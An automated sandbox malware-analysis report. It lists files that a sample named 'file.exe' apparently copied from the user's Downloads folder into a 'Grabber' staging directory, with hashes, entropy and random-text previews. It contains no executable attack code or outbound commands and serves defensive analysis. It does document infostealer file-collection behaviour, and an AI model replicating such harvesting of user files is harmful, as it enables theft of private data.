                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\NIRMEKAMZH.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\NIRMEKAMZH.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\PWZOQIFCAN.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\QFAPOWPAFG.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\QFAPOWPAFG.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\SNIPGPPREP.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\SNIPGPPREP.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\UBVUNTSCZJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:UBVUNTSCZJAGLEGJZLCTIUQFFTUXDGDMZJQSDGEUEZOCBPGJSTOXKFSFTPIFBIKUDFGJYNMGAHDLCCBOEEEUNDVTZSSGPULUJZCBRUSSRMTLDUGQOQKVROLRJDHOOHJXMEPMNZDGEBDTTAEAEJCKLRVWCOLIIJKXJVGJTDGTJTMJYRSSCFIUBQJSAAGFSLSZFDVWSBSLSFWVWAKIVRABMEABTSRVNHFAUBQVUKUGKOQLXKMVCHWOENBPZIRFFNIBJHBXJZOSTOJMCOMWJYXIRUTOLTBLVSGVAMTJXLCOKCNQALOCPGXTFQAUQFHGAFMBLBVZARLSUCFPEKPDNIIKVYFFALFRMJLPBOIYAEBYGDKMJWVNVCRRTIKWLRPMCWOUQYNZOVRXJZGIBNPUIZVGCFNRVDQJDBZFWNUPAIOVWPSTJPYIFRJEDQXOLNJKZEAKFGCQRFEAEDDTSLANTRTDUFPLZDAQZOEVHBNZBBOWVCJGOJGEENCESIPRLRHJPSJIDZFYFGWBOICBDBARPMJSJVKIRCJDUJTBZDQZSLZRQKLHJNARCATMJTIPRCDTICNCOVWFMTNAMXVKTRCGVRUZXEVVHOCRAMANXYNIATUBIPWGEUAHFOMUVYGSTOPSLYTHFQUZOVARZTTQMZZBFBISOCNEJQIQSHCEZDLCZJBWBPRTPVBULQLKPGBGVXXCAGMQMEWMWVFLTSOIUMKMOXXERANPKKZPXOUEIVBROTGGTVGPVNCXLBBDDBNPFYMAIQENYNXZZSQFDAUBTFLXQZBZOZJSXPYCMWYGTDJCCAJAFDJAKNRUMREQFHKKODROXTZNQKVVBMBOOWUVFRPNRVIHZNACJEUFOKBTDDOXQDLEZIOORSUQSNIXNUGQEZKRSOOHNEWSDAYASMDNIPWCATAIQUBESVNNUPBTFENKJJSJCRPLNTTZSXPLFTUDGBIUBNBEEDWADWKLFZRQSZCOUAERIXPFMGENDQBPODGLAHCD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\VWDFPKGDUF.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
